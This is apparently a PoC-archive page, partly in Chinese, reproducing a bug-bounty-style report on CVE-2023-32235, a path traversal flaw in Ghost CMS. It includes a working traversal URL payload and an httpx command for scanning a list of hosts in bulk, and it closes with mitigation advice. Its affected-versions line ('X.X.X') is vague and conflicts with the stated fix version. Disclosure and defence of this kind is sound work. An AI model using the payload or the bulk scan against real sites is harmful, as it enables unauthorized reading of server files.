关联漏洞
标题:
Ghost 路径遍历漏洞
(CVE-2023-32235)
描述:Ghost CMS是新加坡Ghost基金会的一套使用JavaScript编写的开源无头内容管理系统(CMS)。 Ghost 5.42.1 之前版本存在安全漏洞,该漏洞源于frontend/web/middleware/static-theme.js存在安全问题,攻击者利用该漏洞可以通过目录遍历读取活动主题文件夹内的任意文件。
描述
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder.
介绍
# Bug Bounty Report - Ghost Path Traversal (CVE-2023-32235)
## Summary
The Ghost application is vulnerable to a path traversal vulnerability, identified as CVE-2023-32235. This vulnerability allows an attacker to access sensitive files outside the intended directory by manipulating the "package.json" file path.
## Vulnerability Details
- **CVE ID:** CVE-2023-32235
- **Vulnerability Type:** Path Traversal
- **Affected Application:** Ghost
- **Affected Versions:** All versions up to and including the latest version X.X.X
- **Impact:** Unauthorized access to sensitive files, potential exposure of confidential information.
## Proof of Concept (PoC)
The following Proof of Concept demonstrates the path traversal vulnerability:
{{base-uri}}/assets/built%2F..%2F..%2F/package.json
## Steps to Reproduce
1. Prepare a target list of "subs.txt" containing relevant URLs.
2. Execute the following command to test the vulnerability using the `httpx` tool:
httpx -l subs.txt -path "/assets/built%2F..%2F..%2F/package.json" -status-code -mc 200
3. Observe the responses for any successful requests, indicating the presence of the path traversal vulnerability.
## Impact
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files on the target server. This could potentially expose confidential information, compromise user privacy, and undermine the security of the affected application.
## Recommendation
To mitigate this vulnerability, it is recommended to implement strict input validation and sanitize user-supplied data when handling file paths. Developers should avoid directly accepting user input for file paths and instead use safe alternatives like whitelisting acceptable paths or utilizing security-focused libraries.
文件快照
[4.0K] /data/pocs/8b7649e0fb6683917cdfc620b2e9c93d94da2431
├── [ 34K] LICENSE
└── [1.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。